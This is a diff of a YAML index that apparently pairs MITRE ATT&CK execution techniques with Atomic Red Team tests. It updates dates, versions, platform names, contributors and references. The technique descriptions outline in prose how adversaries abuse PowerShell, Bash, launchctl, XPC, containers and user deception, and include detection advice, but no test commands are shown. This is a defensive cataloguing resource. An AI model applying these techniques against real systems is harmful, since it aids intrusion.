@@ -30236,12 +30552,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -30339,9 +30654,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -30358,19 +30673,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -30379,7 +30693,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -30416,11 +30730,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -30457,11 +30770,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -30480,13 +30792,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -30565,12 +30876,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -30581,6 +30891,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -30591,16 +30902,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -30631,14 +30942,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -30704,39 +31012,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -30745,6 +31027,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -30757,19 +31040,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -30812,7 +31118,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -30828,72 +31134,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -30901,7 +31210,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -30916,7 +31229,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -30943,6 +31256,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -30953,15 +31270,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -30978,7 +31299,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -31026,7 +31347,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -31059,12 +31380,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -31125,8 +31445,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -31148,12 +31469,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -31231,9 +31551,8 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -31349,7 +31668,7 @@ execution:
         name: sh
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -31407,7 +31726,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests:
     - name: Create and Execute Bash Shell Script
@@ -31783,31 +32101,7 @@ execution:
         elevation_required: true
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -31828,25 +32122,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
